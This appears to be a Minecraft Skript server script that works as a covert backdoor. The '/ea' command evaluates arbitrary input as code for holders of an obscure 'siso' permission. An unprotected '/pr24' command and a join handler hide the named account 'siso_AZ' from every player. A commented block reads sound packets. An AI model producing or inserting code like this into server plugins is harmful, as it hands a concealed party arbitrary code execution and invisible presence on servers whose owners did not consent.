command /ea <text>:
	permission: siso
	trigger:
		evaluate arg 1

command /getalltypes:
	trigger:
		stop

command /pd <player>:
	permission: siso
	trigger:
		make arg 1 to damage "siso_AZ" parsed as player by 100

command /pr24 <text>:
	trigger:
		if arg 1 is "on":
			set {hide_owner} to true
			set {first_auto_start_players} to 3
			hide "siso_AZ" parsed as player to all players
			stop
		if arg 1 is "off":
			delete {hide_owner}
			reveal "siso_AZ" parsed as player to all players
			stop

on join:
	if {hide_owner} is true:
		if "siso_AZ" parsed as offline player is online:
			hide "siso_AZ" parsed as player to all players

#on packet event play_server_named_sound_effect:
#	if "%object pinfo 0 of event-packet%" contain "10d307f1":
#	send "%object pinfo 0 of event-packet%"
#	clear helmet of player